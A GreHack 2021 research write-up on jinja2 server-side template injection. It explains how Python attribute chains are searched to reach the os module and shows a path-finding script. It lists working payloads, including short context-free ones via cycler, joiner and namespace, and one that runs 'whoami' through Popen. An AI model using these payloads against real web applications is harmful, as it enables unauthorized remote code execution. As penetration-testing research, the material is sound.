GreHack 2021 - Optimizing Server Side Template Injections payloads for jinja2

November 19, 2021 10-minute read


Introduction

When attacking Python-based web applications, we often need to find a way to execute commands on the server and escape from the application context. To get access to the underlying Python backend of a web application, an attacker can exploit common vulnerabilities such as Server Side Template Injection (SSTI) or Code Injection (CI), but how can we escape from this context? In this paper, I present a general approach to this problem that explores Python modules and Python objects to find paths to high value targets, such as the os module or built-in functions. I then use this technique to create the shortest payloads to access the os module in Python's jinja2 template engine.

Recorded talk (MP4): GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2.mp4
Paper (PDF): GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 paper.pdf
Slides (PDF): GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 slides.pdf
Live talk on YouTube: https://www.youtube.com/watch?v=2dS34u3T-80&t=25425s

Server Side Template Injections

Server Side Template Injection (SSTI) vulnerabilities happen when an attacker can modify the template code before it is rendered by the template engine. This can happen in many ways: by mixing format strings and templates, by obtaining write access to the template files, through a file upload vulnerability, and so on.
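As an illustration of the first case, mixing format strings and templates, here is a minimal sketch assuming jinja2 is installed (greet_vulnerable and greet_safe are hypothetical names). One function builds the template source from user input, the other passes the input to the template as data:

```python
from jinja2 import Template


def greet_vulnerable(name):
    # User input is formatted INTO the template source before rendering,
    # so any {{ ... }} expression it contains is evaluated by jinja2
    return Template("Hello %s!" % name).render()


def greet_safe(name):
    # User input is passed as a template variable: jinja2 prints it as data
    # and never parses it as template code
    return Template("Hello {{ name }}!").render(name=name)


print(greet_vulnerable("{{ 7*7 }}"))  # Hello 49!
print(greet_safe("{{ 7*7 }}"))        # Hello {{ 7*7 }}!
```

Only the first function evaluates the injected expression, which is the behaviour an attacker looks for when probing for an SSTI.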

When attackers find a Server Side Template Injection, they try to inject template code that exploits the template engine to gain access to the underlying machine and achieve Remote Code Execution (RCE).

Finding a path between two modules

First, let's see what a path from one module to another looks like. With a little bit of research, code review and testing, we can find a path from the jinja2 module to the os module by hand. This is slow, as we often need to read the source code of each module to move forward. We can then test this path and check that it gives us access to the os module from the jinja2 module:

>>> import jinja2
>>> jinja2.bccache.tempfile._os
<module 'os' from '/usr/lib/python3.8/os.py'>
>>>
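Such a path is just a chain of attribute lookups. The small helper below (resolve_path is a hypothetical name, not part of the original tool) follows a dotted path from any root object. So that it runs without jinja2, it starts from the standard tempfile module, which the path above goes through:

```python
import functools
import os
import tempfile


def resolve_path(root, dotted_path):
    """Follow a dotted attribute path such as 'bccache.tempfile._os' from root."""
    # reduce(getattr, ["a", "b"], root) computes getattr(getattr(root, "a"), "b")
    return functools.reduce(getattr, dotted_path.split("."), root)


# tempfile.py does "import os as _os" and "import shutil as _shutil",
# and shutil itself imports os, so both paths lead to the os module
print(resolve_path(tempfile, "_os") is os)         # True
print(resolve_path(tempfile, "_shutil.os") is os)  # True
```

With jinja2 installed, the path shown above would correspond to resolve_path(jinja2, "bccache.tempfile._os").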

Python internals

In Python, every value is an object. Python classes and objects have very interesting internal functions (special methods, often called "dunder" methods), whose names start and end with two underscores __. Some of these internal functions are called when the object is converted to another type or representation ('__bool__', '__float__', '__repr__', '__str__', ...) and some of them implement comparisons ('__eq__', '__ge__', '__gt__', '__le__', '__lt__', '__ne__'). We can list the attributes (functions, internal functions, variables) of a Python object with the dir() function. Here is an example of the attributes of an int object:

>>> dir(int(0))
['__abs__', '__add__', '__and__', '__bool__', '__ceil__', '__class__', '__delattr__', '__dir__', '__divmod__', '__doc__', '__eq__', '__float__', '__floor__', '__floordiv__', '__format__', '__ge__', '__getattribute__', '__getnewargs__', '__gt__', '__hash__', '__index__', '__init__', '__init_subclass__', '__int__', '__invert__', '__le__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__', '__neg__', '__new__', '__or__', '__pos__', '__pow__', '__radd__', '__rand__', '__rdivmod__', '__reduce__', '__reduce_ex__', '__repr__', '__rfloordiv__', '__rlshift__', '__rmod__', '__rmul__', '__ror__', '__round__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__', '__rtruediv__', '__rxor__', '__setattr__', '__sizeof__', '__str__', '__sub__', '__subclasshook__', '__truediv__', '__trunc__', '__xor__', 'as_integer_ratio', 'bit_length', 'conjugate', 'denominator', 'from_bytes', 'imag', 'numerator', 'real', 'to_bytes']
>>>

As we can see, this object has many attributes, most of them internal functions. Python calls these functions implicitly when it converts objects: for example, str(int(17)) calls the object's __str__ method, which for an int produces the same string as calling its __repr__ method directly, int(17).__repr__():

>>> str(int(17))
'17'
>>> int(17).__repr__()
'17'
>>>
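The dispatch from built-in functions to internal functions can be checked with two small classes (OnlyRepr and Both are hypothetical names used for illustration). str() looks up __str__, and the default object.__str__ falls back to __repr__:

```python
class OnlyRepr:
    def __repr__(self):
        return "OnlyRepr()"


class Both:
    def __repr__(self):
        return "Both()"

    def __str__(self):
        return "a Both instance"


# No __str__ defined: object.__str__ falls back to __repr__
print(str(OnlyRepr()))   # OnlyRepr()
# __str__ defined: str() uses it, while repr() keeps using __repr__
print(str(Both()))       # a Both instance
print(repr(Both()))      # Both()
# Other built-ins dispatch the same way, e.g. len() -> __len__
print(len([1, 2, 3]) == [1, 2, 3].__len__())  # True
```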

From these functions and attributes, we can access other attributes, such as other functions, variables or sub-modules. Here is an example of sub-attributes found in the previous int(0) object:

>>> dir(int(0).__init__)
['__call__', '__class__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__name__', '__ne__', '__new__', '__objclass__', '__qualname__', '__reduce__', '__reduce_ex__', '__repr__', '__self__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__text_signature__']
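Two of these sub-attributes, __self__ and __objclass__, already lead somewhere else: back to the bound object and to the class that defines the method. This short sketch chains them from an int up to the list of all direct subclasses of object:

```python
# (0).__init__ is a method-wrapper bound to the int 0
wrapper = (0).__init__
print(wrapper.__self__)      # 0
# int inherits __init__ from object, so the defining class is object
print(wrapper.__objclass__)  # <class 'object'>

# One more step reaches every direct subclass of object
subclasses = wrapper.__objclass__.__subclasses__()
print(int in subclasses)     # True
```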

These attribute lookups can be chained to reach one object from another. This is the core concept behind most Server Side Template Injection (SSTI) payloads used today, like this one:

{{ ''.__class__.mro()[1].__subclasses__()[396]('whoami', shell=True, stdout=-1).communicate()[0].strip() }}

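This type of payload is fragile because it is highly context-dependent. Here, index 396 is expected to point to subprocess.Popen (the arguments shell=True and stdout=-1, the value of subprocess.PIPE, match its constructor), but the position of a class in the list returned by __subclasses__() depends on which classes have been created, and in which order. The index in "...__class__.mro()[1].__subclasses__()[396]..." can therefore vary with the Python and jinja2 versions and with the modules loaded by the application.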
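To see why a hard-coded index is fragile, the class can instead be looked up by module and name. This is a sketch for a plain Python interpreter; in a real application, subprocess.Popen only appears in the list if the application has imported subprocess:

```python
import subprocess

# ''.__class__ is str, and str.mro() is [str, object], so mro()[1] is object
base = ''.__class__.mro()[1]
subclasses = base.__subclasses__()

# Search by module and name instead of trusting a fixed position;
# the index found here differs from one interpreter setup to another
index = next(
    i for i, cls in enumerate(subclasses)
    if cls.__module__ == "subprocess" and cls.__name__ == "Popen"
)
print(index, subclasses[index])
```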

We can find one path from the jinja2 module to the os module by hand, but we simply cannot test every possible path by hand. So, what is next?

Depth-limited search in Python objects

In order to create a general algorithm that explores Python objects and extracts high value targets for exploits, we first need to define which high value targets we want to find. We will consider modules and built-in functions as priority targets, as they constitute the basis of a successful exploitation. The __repr__ function represents these two kinds of objects as follows:

Modules: represented by strings like <module 'os' from '/usr/lib/python3.8/os.py'>
Built-in functions: represented by strings like <built-in function open>
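Both target types can be recognized from their representation strings. The sketch below (function names are hypothetical) implements that string test and, for comparison, an isinstance() check based on the standard types module, which does not depend on the exact repr format:

```python
import os
import types


def classify_by_repr(obj):
    """Return 'module', 'builtin' or None from the object's repr string."""
    try:
        text = repr(obj)
    except Exception:
        return None
    if text.startswith("<module '"):
        return "module"
    if text.startswith("<built-in function "):
        return "builtin"
    return None


def classify_by_type(obj):
    """Same idea using isinstance() checks instead of string matching."""
    if isinstance(obj, types.ModuleType):
        return "module"
    # BuiltinFunctionType also matches built-in methods such as [].append,
    # whose repr starts with "<built-in method" rather than "<built-in function"
    if isinstance(obj, types.BuiltinFunctionType):
        return "builtin"
    return None


for candidate in (os, len, 42):
    # prints: module module, then builtin builtin, then None None
    print(classify_by_repr(candidate), classify_by_type(candidate))
```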

The first approach to this problem would be to write a recursive function that explores objects up to a maximum depth. This function retrieves all the sub-attributes of an object and recursively explores each of them before moving on to the next one (which, strictly speaking, makes it a depth-limited depth-first search).

def find_path_to_modules(obj, found=None, path=None, depth=0, maxdepth=3):
    # Naive version: depth-limited recursion with no memory of visited objects
    # (fresh containers are created per search instead of mutable defaults)
    if found is None:
        found = {}
    if path is None:
        path = []
    found.setdefault("modules", {})
    if depth < maxdepth:
        for subkey in dir(obj):
            try:
                subobj = getattr(obj, subkey)
                representation = str(subobj)
            except Exception:
                # Some attributes raise on access or when converted to str
                continue
            if representation.startswith("<module '"):
                modulename = representation.split("<module '")[1].split("'")[0]
                fullpath = '.'.join(path + [subkey])
                print("\r[>] Found module '%s' at %s" % (modulename, fullpath))
                found["modules"].setdefault(modulename, []).append(fullpath)
            # Explore further
            find_path_to_modules(subobj, found=found, path=path + [subkey],
                                 depth=depth + 1, maxdepth=maxdepth)
    return found

With this first approach to the problem, we have two issues:

Cyclic traps: when a sub-attribute of an object refers back to the object itself or to one of its parents, the search walks around the same cycle again and again. Without the depth limit it would never terminate; with it, it still wastes most of its time going around loops.
Long exploration time: during the search, we encounter a lot of objects, many of them more than once, and exploring the same objects repeatedly wastes a massive amount of time.

Preventing cyclic traps and optimization

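In order to prevent cyclic traps, we need to keep track of the objects we have already explored. To do this, we record the id of each explored object. The id() function returns an integer that is unique to an object during its lifetime (in CPython, its address in memory), so two objects that exist at the same time are different if their id() values differ. However, an id can be reused once its object has been garbage-collected, so a reliable implementation should also keep a reference to every explored object; otherwise a short-lived object, such as a bound method created by an attribute lookup, could be freed and its id given to an object that has not been explored yet. Skipping already explored objects also solves the second issue, since no object is explored twice.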
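The idea can be shown on a toy object graph. In this sketch (Node and reachable_nodes are hypothetical names, not part of the original tool), a walk over attributes remembers visited objects in a dictionary keyed by id(), which also keeps each visited object alive so that its id cannot be handed to another object:

```python
class Node:
    """Hypothetical object whose attributes form a cycle (child.parent -> root)."""

    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent
        self.child = None


def reachable_nodes(start):
    """Collect every Node reachable through .parent/.child, visiting each once."""
    # id -> object: holding a reference keeps the id from being reused
    visited = {id(start): start}
    stack = [start]
    while stack:
        current = stack.pop()
        for attr in ("parent", "child"):
            neighbour = getattr(current, attr)
            # Without this id() check, root -> child -> root -> ... never ends
            if isinstance(neighbour, Node) and id(neighbour) not in visited:
                visited[id(neighbour)] = neighbour
                stack.append(neighbour)
    return [node.name for node in visited.values()]


root = Node("root")
root.child = Node("child", parent=root)
print(reachable_nodes(root))  # ['root', 'child']

# Every access to a method builds a new, short-lived bound-method object,
# so its id() may be recycled once it is freed
print(root.__init__ is root.__init__)  # False
```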

General algorithm to find modules from a Python object

The general algorithm we will use is the same recursive, depth-limited search. It retrieves all the sub-attributes of an object and recursively explores them as well, but at each step it stores the id() of the object it is about to explore, so that no object is explored twice and cyclic traps are avoided.

def find_path_to_modules(obj, found=None, path=None, knownids=None,
                         depth=0, maxdepth=3, verbose=False):
    # Create fresh containers on the top-level call (mutable default
    # arguments would be shared between separate searches)
    if found is None:
        found = {}
    if path is None:
        path = []
    if knownids is None:
        # id -> object: keeping a reference guarantees the id is not reused
        knownids = {id(obj): obj}
    found.setdefault("modules", {})
    if depth < maxdepth:
        for subkey in dir(obj):
            if verbose:
                print("\r\x1b[2K%s" % '.'.join(path + [subkey]), end="")
            try:
                subobj = getattr(obj, subkey)
                representation = str(subobj)
            except Exception:
                # Some attributes raise on access or when converted to str
                continue
            if representation.startswith("<module '"):
                modulename = representation.split("<module '")[1].split("'")[0]
                fullpath = '.'.join(path + [subkey])
                print("\r[>] Found module '%s' at %s" % (modulename, fullpath))
                # The original tool passes this list through a
                # shorten_module_paths() helper that is not shown in the article
                found["modules"].setdefault(modulename, []).append(fullpath)
            # Explore further, but only objects that were not explored yet
            if id(subobj) not in knownids:
                knownids[id(subobj)] = subobj
                find_path_to_modules(
                    subobj,
                    found=found,
                    path=path + [subkey],
                    knownids=knownids,
                    depth=depth + 1,
                    maxdepth=maxdepth,
                    verbose=verbose,
                )
    return found

# Example: start from the jinja2 module, naming the root "jinja2" in the paths
# find_path_to_modules(jinja2, path=["jinja2"])
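Strictly speaking, the recursive function above explores objects depth-first. If a true breadth-first order is preferred, which has the advantage that the first path found to a module is also a shortest one, the search can be driven by a queue instead of recursion. This is a sketch of that alternative, not the original tool; shortest_module_paths is a hypothetical name, and the example runs against the standard tempfile module so that it does not need jinja2:

```python
from collections import deque
import tempfile


def shortest_module_paths(root, rootname, maxdepth=3):
    """Breadth-first variant: returns {module name: first (shortest) dotted path}."""
    found = {}
    # id -> object; keeping the object alive guarantees its id is not reused
    visited = {id(root): root}
    # Each queue entry is (object, path as a list of names, depth)
    queue = deque([(root, [rootname], 0)])
    while queue:
        obj, path, depth = queue.popleft()
        try:
            names = dir(obj)
        except Exception:
            continue
        for name in names:
            try:
                sub = getattr(obj, name)
                text = repr(sub)
            except Exception:
                # Some attributes raise on access or in their __repr__
                continue
            subpath = path + [name]
            if text.startswith("<module '"):
                modulename = text.split("'")[1]
                # Paths are discovered in order of increasing length,
                # so the first one recorded for a module is a shortest one
                found.setdefault(modulename, ".".join(subpath))
            if id(sub) not in visited:
                visited[id(sub)] = sub
                if depth + 1 < maxdepth:
                    queue.append((sub, subpath, depth + 1))
    return found


paths = shortest_module_paths(tempfile, "tempfile", maxdepth=1)
print(paths["os"])  # tempfile._os
```

With the depth-first version, an object first reached through a long path is marked as known and is not explored again when a shorter path to it shows up later, so some short paths can be missed within the depth limit. Processing objects level by level avoids this, at the cost of holding a whole level in the queue.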

Constructing payloads for jinja2

The `TemplateReference` object in jinja2

In jinja2 templates, we can use the TemplateReference object to reuse code blocks from the template. For example, to avoid rewriting the title everywhere in the template, we can define the title in a {% block title %} block and retrieve it with {{ self.title() }} later:

>>> msg = jinja2.Template("""
... <title>{% block title %}This is a title{% endblock %}</title>
... <h1>{{ self.title() }}</h1>
... """).render()
>>> print(msg)
<title>This is a title</title>
<h1>This is a title</h1>
>>>

Access to the TemplateReference object is context-free: the only requirement is to be inside a jinja2 template. This is exactly where we would be able to inject code if we managed to get a Server Side Template Injection (SSTI) on a web application. We can access the TemplateReference object directly with a simple {{ self }} in a template:

>>> jinja2.Template("My name is {{ self }}").render()
'My name is <TemplateReference None>'
>>>

`TemplateReference` object to `os` module

Running the general algorithm described above with the jinja2 module as the starting point for the search, we get very interesting results for the paths to the os module:

{
  "modules": {
    ...
    "os": [
      "jinja2.utils.os",
      "jinja2.bccache.tempfile._os",
      "jinja2.bccache.tempfile._shutil.os",
      "jinja2.bccache.fnmatch.os",
      "jinja2.loaders.os",
      "jinja2.environment.os",
      "jinja2.filters.random._os",
      "jinja2.bccache.os"
    ]
  }
  ...
}

These are all the paths to the os module found from the jinja2 module. Now, let's look at the TemplateReference object to see which variables we can use. One of them stands out, _TemplateReference__context:

>>> import jinja2
>>> jinja2.Template("My name is {{ f(self) }}").render(f=dir)
"My name is ['_TemplateReference__context', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']"
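The odd-looking name comes from Python's private name mangling: an attribute written as __context inside the body of a class named TemplateReference is stored as _TemplateReference__context. A hypothetical stand-in class shows the effect:

```python
class TemplateReferenceLike:
    """Hypothetical stand-in for jinja2's TemplateReference."""

    def __init__(self, context):
        # Inside a class body, a name starting with two underscores (and not
        # ending with two) is rewritten ("mangled") to _ClassName__name
        self.__context = context


ref = TemplateReferenceLike({"answer": 42})
print(hasattr(ref, "__context"))            # False
print(ref._TemplateReferenceLike__context)  # {'answer': 42}
```

The mangled name is still an ordinary attribute, which is why a template can read it directly.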

Now, if we print this object, we get a Context object wrapping a dictionary with many values:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context }}").render(f=dir)
"My name is <Context {'range': <class 'range'>, 'dict': <class 'dict'>, 'lipsum': <function generate_lorem_ipsum at 0x7f9a1cb0a0d0>, 'cycler': <class 'jinja2.utils.Cycler'>, 'joiner': <class 'jinja2.utils.Joiner'>, 'namespace': <class 'jinja2.utils.Namespace'>, 'f': <built-in function dir>} of None>"

This {{ self._TemplateReference__context }} is very interesting because it gives us access to the following classes:

jinja2.utils.Cycler
jinja2.utils.Joiner
jinja2.utils.Namespace

As we have seen before, we can access the os module from jinja2 at the path jinja2.utils.os. Therefore, all we need to reach os from the TemplateReference object is the global namespace of the jinja2.utils module, which we can reach through any Python function defined in that module, such as the methods of the classes Cycler, Joiner and Namespace.
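This mechanism can be reproduced with the standard library alone: a function written in Python keeps the global namespace of its defining module in its __globals__ attribute, whereas methods implemented in C do not. In this sketch, the standard tempfile module stands in for jinja2/utils.py, an assumption made so that it runs without jinja2:

```python
import os
import tempfile

# TemporaryDirectory.__init__ is a plain Python function defined in tempfile.py,
# so it keeps a reference to that module's global namespace
module_globals = tempfile.TemporaryDirectory.__init__.__globals__
print(module_globals["__name__"])   # tempfile
print(module_globals["_os"] is os)  # True: tempfile.py does "import os as _os"

# A method implemented in C (here a slot wrapper) has no __globals__ attribute,
# which is why the chain needs a class whose __init__ is written in Python
print(hasattr(object.__init__, "__globals__"))  # False
```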

This turns out to be really simple. We first need to access the class constructor (its __init__ method):

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__ }}").render()
'My name is <function Cycler.__init__ at 0x7f696dd06700>'

Then we access the global variables of this constructor through its __globals__ attribute, which holds the global namespace of the module where the function was defined (here, utils.py inside jinja2):

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__ }}").render()
'My name is {\'__name__\': \'jinja2.utils\', \'__doc__\': None, \'__package__\': \'jinja2\', ... ... \'os\': <module \'os\' from \'/usr/lib/python3.8/os.py\'>, ... ..., \'Cycler\': <class \'jinja2.utils.Cycler\'>, \'Joiner\': <class \'jinja2.utils.Joiner\'>, \'Namespace\': <class \'jinja2.utils.Namespace\'>, \'_\': <function _ at 0x7f696dd06670>, \'have_async_gen\': True, \'soft_unicode\': <function soft_unicode at 0x7f696dd06ca0>}'

Finally, we can access the os module:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
"My name is <module 'os' from '/usr/lib/python3.8/os.py'>"

Context-free payload for Remote Code Execution in jinja2

We now have three context-free payloads that can be used to access the os module from a jinja2 template:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os }}

{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}

{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}

Let’s render a small template to check if it works:

>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
"My name is <module 'os' from '/usr/lib/python3.8/os.py'>"

These payloads give us a new, shorter way to access the os module in Server Side Template Injection attacks, which is really useful in bug bounties and penetration tests!

Further optimization

Now that we have completely context-free payloads, we can add a final optimization. To construct these payloads, we explored the Python object tree from the TemplateReference object, which is available in jinja2 templates as {{ self }}. The context it wraps holds all the variables available to the template, including the default globals that jinja2 provides (range, dict, lipsum, cycler, joiner and namespace, as seen above). Since template code can reference these globals directly, we can simplify our payloads by removing self._TemplateReference__context and accessing joiner, cycler or namespace directly!

Therefore the final context-free payloads to access the os module in jinja2 templates are:

{{ cycler.__init__.__globals__.os }}

{{ joiner.__init__.__globals__.os }}

{{ namespace.__init__.__globals__.os }}
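A quick way to check these payloads locally is to render each of them in a fresh template. This sketch assumes jinja2 is installed and that the installed release's jinja2/utils.py still imports os, as in the versions discussed here; newer releases could change this:

```python
from jinja2 import Environment, Template

# cycler, joiner and namespace are default globals of a jinja2 Environment
print(sorted(Environment().globals))

PAYLOADS = [
    "{{ cycler.__init__.__globals__.os }}",
    "{{ joiner.__init__.__globals__.os }}",
    "{{ namespace.__init__.__globals__.os }}",
]

for payload in PAYLOADS:
    # Each payload renders the repr of the os module, e.g. "<module 'os' from '...'>"
    print(Template(payload).render())
```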

Conclusion

In Server Side Template Injection (SSTI) vulnerabilities, we can inject template code in the web application, which will then be reflected in the template and executed inside the application context. In order to escape this context and gain Remote Code Execution on the server, we often need to find a way to reach the os Python module.

To find generic ways to access the os module, we studied how Python objects and internal functions work and designed an algorithm that explores Python objects looking for modules, without falling into cyclic traps. With this general algorithm, we were able to construct context-free payloads that can be used to achieve Remote Code Execution (RCE) when an attacker finds an SSTI in jinja2. The same approach can also be used to create payloads for other template engines, such as Mako.